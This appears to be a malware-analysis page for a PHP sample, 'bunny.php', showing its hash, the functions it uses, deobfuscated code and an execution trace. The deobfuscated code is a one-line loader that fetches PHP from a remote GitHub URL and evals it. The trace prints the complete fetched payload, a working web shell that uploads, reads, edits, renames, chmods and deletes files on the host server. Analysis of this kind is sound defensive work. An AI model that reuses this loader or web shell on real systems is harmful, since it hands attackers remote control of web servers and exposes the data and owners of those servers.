bunny.php

md5: 26bdbdd7283e881e3e70598a5ede29c2

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Traces)
getcwd (Traces)
set_time_limit (Traces)

Execution
eval (Deobfuscated, Original, Traces)

Files
copy (Traces)
file_get_contents (Deobfuscated, Original, Traces)

Input
_FILES (Traces)
_GET (Traces)
_POST (Traces)

Title
ILMU TEKNOLOGI (HTML)

URLs
https://raw.githubusercontent.com/LanangAkira/OniChan/main/bunsin.php (Deobfuscated, Original, Traces)

Deobfuscated PHP code
<?php

echo eval("?>" . file_get_contents("https://raw.githubusercontent.com/LanangAkira/OniChan/main/bunsin.php"));
Execution traces
data/traces/26bdbdd7283e881e3e70598a5ede29c2_trace-1676242942.3681.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:02:48.265901]
1	0	1	0.000137	393512
1	3	0	0.000183	393528	{main}	1		/var/www/html/uploads/bunny.php	0	0
2	4	0	0.000200	393528	file_get_contents	0		/var/www/html/uploads/bunny.php	1	1	'https://raw.githubusercontent.com/LanangAkira/OniChan/main/bunsin.php'
2	4	1	0.037897	408848
2	4	R			'<?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\n\tforeach($_POST as $key=>$value){\r\n\t\t$_POST[$key] = stripslashes($value);\r\n\t}\r\n} echo \'<!DOCTYPE HTML>\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t\t<title>ILMU TEKNOLOGI</title>\r\n\t\t\t<link href="" rel="stylesheet" type="text/css">\r\n\t\t\t<style>\r\n\t\t\t\tbody {\r\n\t\t\t\t\tfont-family: "tahoma", cursive;\r\n\t\t\t\t\tbackground-color: black;\r\n\t\t\t\t\tcolor:cyan;\r\n\t\t\t\t}\r\n\t\t\t\t#content tr:hover{'
2	5	0	0.038341	461848	eval	1	'?><?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\n\tforeach($_POST as $key=>$value){\r\n\t\t$_POST[$key] = stripslashes($value);\r\n\t}\r\n} echo \'<!DOCTYPE HTML>\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t\t<title>ILMU TEKNOLOGI</title>\r\n\t\t\t<link href="" rel="stylesheet" type="text/css">\r\n\t\t\t<style>\r\n\t\t\t\tbody {\r\n\t\t\t\t\tfont-family: "tahoma", cursive;\r\n\t\t\t\t\tbackground-color: black;\r\n\t\t\t\t\tcolor:cyan;\r\n\t\t\t\t}\r\n\t\t\t\t#content tr:hover{\r\n\t\t\t\t\ttext-shadow:0px 0px 10px;\r\n\t\t\t\t}\r\n\t\t\t\t#content .first{\r\n\t\t\t\tbackground-color: green;\r\n\t\t\t\t}\r\n\t\t\t\ttable{\r\n\t\t\t\t\tborder: 1px #000000 dotted;\r\n\t\t\t\t}\r\n\t\t\t\ta{\r\n\t\t\t\t\tcolor:cyan;\r\n\t\t\t\t\ttext-decoration: none;\r\n\t\t\t\t}\r\n\t\t\t\ta:hover{\r\n\t\t\t\t\tcolor:white;\r\n\t\t\t\t\ttext-shadow:0px 0px 10px transparent;\r\n\t\t\t\t}\r\n\t\t\t\tinput,select,textarea{\r\n\t\t\t\t\tborder: 1px white solid;\r\n\t\t\t\t\t-moz-border-radius: 5px;\r\n\t\t\t\t\t-webkit-border-radius:5px;\r\n\t\t\t\t\tborder-radius:5px;\r\n\t\t\t\t}\r\n\t\t\t</style>\r\n\t\t</head>\r\n\t\t<body>\r\n\t\t\t<h1>\r\n\t\t\t\t<center>\r\n\t\t\t\t\t<font color="cyan">GOOGLE</font>\r\n\t\t\t\t</center>\r\n\t\t\t</h1>\r\n\t\t\t<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\t\t\t\t<tr>\r\n\t\t\t\t\t<td>\r\n\t\t\t\t\t\t<font color="white">aku nok ndi :</font> \';\r\n\r\nif(isset($_GET[\'path\'])){\r\n\t$path = $_GET[\'path\'];\r\n} else{\r\n\t$path = getcwd();\r\n} \r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\n\tif($pat == \'\' && $id == 0){\r\n\t\t$a = true;\r\n\t\techo \'<a href="?path=/">/</a>\';\r\n\t\tcontinue;\r\n\t}\r\n\tif($pat == \'\') continue;\r\n\techo \'<a href="?path=\';\r\n\tfor($i=0;$i<=$id;$i++){\r\n\t\techo "$paths[$i]";\r\n\t\tif($i != $id) echo "/";\r\n\t}\r\n\techo \'">\'.$pat.\'</a>/\';\r\n} echo \'</td></tr><tr><td>\';\r\nif(isset($_FILES[\'file\'])){\r\n\tif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\n\t\techo \'<font color="cyan">Upload Succeeded</font><br />\';\r\n\t} else{\r\n\t\techo \'<font color="red">Upload Failed</font><br/>\';\r\n\t}\r\n} echo \'<form enctype="multipart/form-data" method="POST">\r\n\t\t<font color="white">File Up :</font> <input type="file" name="file" />\r\n\t\t<input type="submit" value="aplod :v" />\r\n\t\t</form>\r\n\t\t</td>\r\n\t\t</tr>\';\r\n\r\nif(isset($_GET[\'filesrc\'])){\r\n\techo "<tr><td>aku nok ndi : ";\r\n\techo $_GET[\'filesrc\'];\r\n\techo \'</tr></td></table><br />\';\r\n\techo(\'<pre>\'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</pre>\');\r\n} elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\n\techo \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\n\tif($_POST[\'opt\'] == \'chmod\'){\r\n\t\tif(isset($_POST[\'perm\'])){\r\n\t\t\tif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\n\t\t\t\techo \'<font color="cyan">Change Permission Successful</font><br/>\';\r\n\t\t\t} else{\r\n\t\t\t\techo \'<font color="red">Change Permission Failed</font><br />\';\r\n\t\t\t}\r\n\t\t} echo \'<form method="POST">\r\n\t\t\t\tPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\r\n\t\t\t\t<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t\t\t<input type="hidden" name="opt" value="chmod">\r\n\t\t\t\t<input type="submit" value="Go" />\r\n\t\t\t\t</form>\';\r\n\t\t\t} elseif($_POST[\'opt\'] == \'rename\'){\r\n\t\t\t\tif(isset($_POST[\'newname\'])){\r\n\t\t\t\t\tif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\n\t\t\t\t\t\techo \'<font color="cyan">Rename Successfully</font><br/>\';\r\n\t\t\t\t\t} else{\r\n\t\t\t\t\t\techo \'<font color="red">Rename Failed</font><br />\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$_POST[\'name\'] = $_POST[\'newname\'];\r\n\t\t\t\t} echo \'<form method="POST">\r\n\t\t\t\t\t\tNew Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n\t\t\t\t\t\t<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t\t\t\t\t<input type="hidden" name="opt" value="rename">\r\n\t\t\t\t\t\t<input type="submit" value="Go" />\r\n\t\t\t\t\t\t</form>\';\r\n\t\t\t\t\t} elseif($_POST[\'opt\'] == \'edit\'){\r\n\t\t\t\t\t\tif(isset($_POST[\'src\'])){\r\n\t\t\t\t\t\t\t$fp = fopen($_POST[\'path\'],\'w\');\r\n\t\t\t\t\t\t\tif(fwrite($fp,$_POST[\'src\'])){\r\n\t\t\t\t\t\t\t\techo \'<font color="cyan">Successfully Edit File</font><br/>\';\r\n\t\t\t\t\t\t\t} else{\r\n\t\t\t\t\t\t\t\techo \'<font color="red">Failed to Edit File</font><br/>\';\r\n\t\t\t\t\t\t\t} fclose($fp);\r\n\t\t\t\t\t\t} echo \'<form method="POST">\r\n\t\t\t\t\t\t\t\t<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n\t\t\t\t\t\t\t\t<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t\t\t\t\t\t\t<input type="hidden" name="opt" value="edit">\r\n\t\t\t\t\t\t\t\t<input type="submit" value="Save" />\r\n\t\t\t\t\t\t\t\t</form>\';\r\n\t\t\t\t\t\t\t} echo \'</center>\';\r\n\t\t\t\t\t\t} else{\r\n\t\t\t\t\t\t\techo \'</table><br/><center>\';\r\n\t\t\t\t\t\t\tif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\n\t\t\t\t\t\t\t\tif($_POST[\'type\'] == \'dir\'){\r\n\t\t\t\t\t\t\t\t\tif(rmdir($_POST[\'path\'])){\r\n\t\t\t\t\t\t\t\t\t\techo \'<font color="cyan">Deleted Directory</font><br/>\';\r\n\t\t\t\t\t\t\t\t\t} else{\r\n\t\t\t\t\t\t\t\t\t\techo \'<font color="red">Directory Failed Deleted</font><br/>\';\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} elseif($_POST[\'type\'] == \'file\'){\r\n\t\t\t\t\t\t\t\t\tif(unlink($_POST[\'path\'])){\r\n\t\t\t\t\t\t\t\t\t\techo \'<font color="cyan">Deleted Files</font><br/>\';\r\n\t\t\t\t\t\t\t\t\t} else{\r\n\t\t\t\t\t\t\t\t\t\techo \'<font color="red">File Failed Deleted</font><br/>\';\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t} echo \'</center>\';\r\n\t\t\t\t\t\t\t$scandir = scandir($path);\r\n\t\t\t\t\t\t\techo \'<div id="content">\r\n\t\t\t\t\t\t\t\t  <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\t\t\t\t\t\t\t\t \t<tr class="first">\r\n\t\t\t\t\t\t\t\t\t\t<td>\r\n\t\t\t\t\t\t\t\t\t\t\t<center>Name</peller></center>\r\n\t\t\t\t\t\t\t\t\t\t</td>\r\n\t\t\t\t\t\t\t\t\t\t<td>\r\n\t\t\t\t\t\t\t\t\t\t\t<center>Size</peller></center>\r\n\t\t\t\t\t\t\t\t\t\t</td>\r\n\t\t\t\t\t\t\t\t\t\t<td>\r\n\t\t\t\t\t\t\t\t\t\t\t<center>Permission</peller></center>\r\n\t\t\t\t\t\t\t\t\t\t</td>\r\n\t\t\t\t\t\t\t\t\t\t<td>\r\n\t\t\t\t\t\t\t\t\t\t\t<center>Modify</peller></center>\r\n\t\t\t\t\t\t\t\t\t\t</td>\r\n\t\t\t\t\t\t\t\t\t</tr>\';\r\n\r\nforeach($scandir as $dir){\r\n\tif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\n\techo \'<tr>\r\n\t\t  <td><a href="?path=\'.$path.\'/\'.$dir.\'">\'.$dir.\'</a></td>\r\n\t\t  <td><center>--</center></td>\r\n\t\t  <td><center>\';\r\n\t\t  if(is_writable($path.\'/\'.$dir)) echo \'<font color="cyan">\';\r\n\t\t  elseif(!is_readable($path.\'/\'.$dir)) echo \'<font color="red">\';\r\n\t\t  echo perms($path.\'/\'.$dir);\r\n\t\t  if(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'</font>\';\r\n\t\t  echo \'</center></td>\r\n\t\t  \t\t<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n\t\t  \t\t\t<select name="opt">\r\n\t\t  \t\t\t\t<option value="">Select</option>\r\n\t\t\t\t\t\t<option value="delete">Delete</option>\r\n\t\t\t\t\t\t<option value="chmod">Chmod</option>\r\n\t\t\t\t\t\t<option value="rename">Rename</option>\r\n\t\t\t\t\t</select>\r\n\t\t\t\t\t<input type="hidden" name="type" value="dir">\r\n\t\t\t\t\t<input type="hidden" name="name" value="\'.$dir.\'">\r\n\t\t\t\t\t<input type="hidden" name="path" value="\'.$path.\'/\'.$dir.\'">\r\n\t\t\t\t\t<input type="submit" value=">">\r\n\t\t\t\t\t</form></center></td>\r\n\t\t\t\t\t</tr>\';\r\n\t\t\t\t} echo \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\n\r\nforeach($scandir as $file){\r\n\tif(!is_file($path.\'/\'.$file)) continue;\r\n\t$size = filesize($path.\'/\'.$file)/1024;\r\n\t$size = round($size,3);\r\n\tif($size >= 1024){\r\n\t\t$size = round($size/1024,2).\' MB\';\r\n\t} else{\r\n\t\t$size = $size.\' KB\';\r\n\t} echo \'<tr>\r\n\t\t\t<td><a href="?filesrc=\'.$path.\'/\'.$file.\'&path=\'.$path.\'">\'.$file.\'</a></td>\r\n\t\t\t<td><center>\'.$size.\'</center></td>\r\n\t\t\t<td><center>\';\r\n\r\nif(is_writable($path.\'/\'.$file)) echo \'<font color="cyan">\';\r\nelseif(!is_readable($path.\'/\'.$file)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$file);\r\nif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'</font>\';\r\necho \'</center></td>\r\n\t  <td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n\t  <select name="opt">\r\n\t  \t<option value="">Select</option>\r\n\t  \t<option value="delete">Delete</option>\r\n\t  \t<option value="chmod">Chmod</option>\r\n\t  \t<option value="rename">Rename</option>\r\n\t  \t<option value="edit">Edit</option>\r\n\t  </select>\r\n\t  <input type="hidden" name="type" value="file">\r\n\t  <input type="hidden" name="name" value="\'.$file.\'">\r\n\t  <input type="hidden" name="path" value="\'.$path.\'/\'.$file.\'">\r\n\t  <input type="submit" value=">">\r\n\t  </form></center></td>\r\n\t  </tr>\';\r\n\t} echo \'</table></div>\';\r\n} echo "<br><center>Copyright © 1945 - </body></html>" . (int)date(\'Y\'). " GOOGLE";\r\n\r\nfunction perms($file){\r\n\t$perms = fileperms($file);\r\n\tif (($perms & 0xC000) == 0xC000) {\r\n\t// Socket\r\n\t\t$info = \'s\';\r\n\t} elseif (($perms & 0xA000) == 0xA000) {\r\n\t// Symbolic Link\r\n\t\t$info = \'l\';\r\n\t} elseif (($perms & 0x8000) == 0x8000) {\r\n\t// Regular\r\n\t\t$info = \'-\';\r\n\t} elseif (($perms & 0x6000) == 0x6000) {\r\n\t// Block special\r\n\t\t$info = \'b\';\r\n\t} elseif (($perms & 0x4000) == 0x4000) {\r\n\t// Directory\r\n\t\t$info = \'d\';\r\n\t} elseif (($perms & 0x2000) == 0x2000) {\r\n\t// Character special\r\n\t\t$info = \'c\';\r\n\t} elseif (($perms & 0x1000) == 0x1000) {\r\n\t// FIFO pipe\r\n\t\t$info = \'p\';\r\n\t} else {\r\n\t// Unknown\r\n\t\t$info = \'u\';\r\n\t}\r\n\t// Owner\r\n\t$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n\t$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n\t$info .= (($perms & 0x0040) ?\r\n\t\t(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n\t\t(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\t\t// Group\r\n\t$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n\t$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n\t$info .= (($perms & 0x0008) ?\r\n\t\t(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n\t\t(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\t\t// World\r\n\t$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n\t$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n\t$info .= (($perms & 0x0001) ?\r\n\t\t(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n\t\t(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $info;\r\n}\r\n?>\r\n'	/var/www/html/uploads/bunny.php	1	0
3	6	0	0.038584	461848	error_reporting	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	2	1	0
3	6	1	0.038601	461888
3	6	R			22527
3	7	0	0.038615	461848	set_time_limit	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	3	1	0
3	7	1	0.038634	461912
3	7	R			FALSE
3	8	0	0.038648	461880	get_magic_quotes_gpc	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	5	0
3	8	1	0.038661	461880
3	8	R			FALSE
3	9	0	0.038676	461880	getcwd	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	59	0
3	9	1	0.038692	461928
3	9	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	59	$path = '/var/www/html/uploads'
3	10	0	0.038720	461928	str_replace	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	61	3	'\\'	'/'	'/var/www/html/uploads'
3	10	1	0.038745	462024
3	10	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	61	$path = '/var/www/html/uploads'
3	11	0	0.038773	461928	explode	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	62	2	'/'	'/var/www/html/uploads'
3	11	1	0.038789	462504
3	11	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	62	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	64	$id = 0
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	66	$a = TRUE
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	64	$id = 1
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i = 0
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	64	$id = 2
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i = 0
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	64	$id = 3
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i = 0
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	64	$id = 4
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i = 0
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	72	$i++
3	12	0	0.039048	462432	scandir	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	157	1	'/var/www/html/uploads'
3	12	1	0.039092	463056
3	12	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bunny.php', 4 => 'data', 5 => 'prepend.php']
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	157	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bunny.php', 4 => 'data', 5 => 'prepend.php']
3	13	0	0.039132	463072	is_dir	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	176	1	'/var/www/html/uploads/.'
3	13	1	0.039149	463136
3	13	R			TRUE
3	14	0	0.039163	463104	is_dir	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	176	1	'/var/www/html/uploads/..'
3	14	1	0.039179	463152
3	14	R			TRUE
3	15	0	0.039193	463112	is_dir	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	176	1	'/var/www/html/uploads/.htaccess'
3	15	1	0.039209	463152
3	15	R			FALSE
3	16	0	0.039223	463112	is_dir	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	176	1	'/var/www/html/uploads/bunny.php'
3	16	1	0.039239	463152
3	16	R			FALSE
3	17	0	0.039252	463112	is_dir	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	176	1	'/var/www/html/uploads/data'
3	17	1	0.039268	463152
3	17	R			TRUE
3	18	0	0.039283	463112	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	181	1	'/var/www/html/uploads/data'
3	18	1	0.039302	463152
3	18	R			TRUE
3	19	0	0.039316	463112	perms	1		/var/www/html/uploads/bunny.php(1) : eval()'d code	183	1	'/var/www/html/uploads/data'
4	20	0	0.039331	463112	fileperms	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	237	1	'/var/www/html/uploads/data'
4	20	1	0.039345	463152
4	20	R			16895
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	237	$perms = 16895
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	252	$info = 'd'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	264	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	265	$info .= 'w'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	268	$info .= 'x'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	270	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	271	$info .= 'w'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	274	$info .= 'x'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	276	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	277	$info .= 'w'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	280	$info .= 'x'
3	19	1	0.039482	463152
3	19	R			'drwxrwxrwx'
3	21	0	0.039497	463112	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	184	1	'/var/www/html/uploads/data'
3	21	1	0.039514	463152
3	21	R			TRUE
3	22	0	0.039528	463120	is_dir	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	176	1	'/var/www/html/uploads/prepend.php'
3	22	1	0.039545	463168
3	22	R			FALSE
3	23	0	0.039559	463112	is_file	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	202	1	'/var/www/html/uploads/.'
3	23	1	0.039575	463136
3	23	R			FALSE
3	24	0	0.039589	463104	is_file	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	202	1	'/var/www/html/uploads/..'
3	24	1	0.039603	463152
3	24	R			FALSE
3	25	0	0.039617	463112	is_file	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	202	1	'/var/www/html/uploads/.htaccess'
3	25	1	0.039633	463152
3	25	R			TRUE
3	26	0	0.039646	463112	filesize	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	203	1	'/var/www/html/uploads/.htaccess'
3	26	1	0.039660	463152
3	26	R			64
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	203	$size = 0.0625
3	27	0	0.039685	463056	round	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	204	2	0.0625	3
3	27	1	0.039699	463128
3	27	R			0.063
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	204	$size = 0.063
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	208	$size = '0.063 KB'
3	28	0	0.039738	463152	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	214	1	'/var/www/html/uploads/.htaccess'
3	28	1	0.039755	463192
3	28	R			FALSE
3	29	0	0.039768	463152	is_readable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	215	1	'/var/www/html/uploads/.htaccess'
3	29	1	0.039784	463192
3	29	R			TRUE
3	30	0	0.039798	463152	perms	1		/var/www/html/uploads/bunny.php(1) : eval()'d code	216	1	'/var/www/html/uploads/.htaccess'
4	31	0	0.039812	463152	fileperms	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	237	1	'/var/www/html/uploads/.htaccess'
4	31	1	0.039825	463192
4	31	R			33188
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	237	$perms = 33188
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	246	$info = '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	264	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	265	$info .= 'w'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	268	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	270	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	271	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	274	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	276	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	277	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	280	$info .= '-'
3	30	1	0.039951	463192
3	30	R			'-rw-r--r--'
3	32	0	0.039965	463152	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	217	1	'/var/www/html/uploads/.htaccess'
3	32	1	0.039982	463192
3	32	R			FALSE
3	33	0	0.039995	463152	is_readable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	217	1	'/var/www/html/uploads/.htaccess'
3	33	1	0.040011	463192
3	33	R			TRUE
3	34	0	0.040025	463152	is_file	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	202	1	'/var/www/html/uploads/bunny.php'
3	34	1	0.040041	463192
3	34	R			TRUE
3	35	0	0.040054	463152	filesize	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	203	1	'/var/www/html/uploads/bunny.php'
3	35	1	0.040068	463192
3	35	R			107
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	203	$size = 0.1044921875
3	36	0	0.040096	463056	round	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	204	2	0.1044921875	3
3	36	1	0.040111	463128
3	36	R			0.104
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	204	$size = 0.104
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	208	$size = '0.104 KB'
3	37	0	0.040149	463152	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	214	1	'/var/www/html/uploads/bunny.php'
3	37	1	0.040166	463192
3	37	R			FALSE
3	38	0	0.040179	463152	is_readable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	215	1	'/var/www/html/uploads/bunny.php'
3	38	1	0.040195	463192
3	38	R			TRUE
3	39	0	0.040208	463152	perms	1		/var/www/html/uploads/bunny.php(1) : eval()'d code	216	1	'/var/www/html/uploads/bunny.php'
4	40	0	0.040222	463152	fileperms	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	237	1	'/var/www/html/uploads/bunny.php'
4	40	1	0.040236	463192
4	40	R			33204
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	237	$perms = 33204
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	246	$info = '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	264	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	265	$info .= 'w'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	268	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	270	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	271	$info .= 'w'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	274	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	276	$info .= 'r'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	277	$info .= '-'
3		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	280	$info .= '-'
3	39	1	0.040362	463192
3	39	R			'-rw-rw-r--'
3	41	0	0.040375	463152	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	217	1	'/var/www/html/uploads/bunny.php'
3	41	1	0.040392	463192
3	41	R			FALSE
3	42	0	0.040405	463152	is_readable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	217	1	'/var/www/html/uploads/bunny.php'
3	42	1	0.040421	463192
3	42	R			TRUE
3	43	0	0.040442	463264	is_file	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	202	1	'/var/www/html/uploads/data'
3	43	1	0.040458	463304
3	43	R			FALSE
3	44	0	0.040471	463272	is_file	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	202	1	'/var/www/html/uploads/prepend.php'
3	44	1	0.040487	463320
3	44	R			TRUE
3	45	0	0.040500	463280	filesize	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	203	1	'/var/www/html/uploads/prepend.php'
3	45	1	0.040514	463320
3	45	R			57
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	203	$size = 0.0556640625
3	46	0	0.040539	463176	round	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	204	2	0.0556640625	3
3	46	1	0.040553	463248
3	46	R			0.056
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	204	$size = 0.056
2		A						/var/www/html/uploads/bunny.php(1) : eval()'d code	208	$size = '0.056 KB'
3	47	0	0.040591	463280	is_writable	0		/var/www/html/uploads/bunny.php(1) : eval()'d code	214	1	'/var/www/html/uploads/prepend.php'
3	47	1	0.040608	463320
3	47	R			FALSE
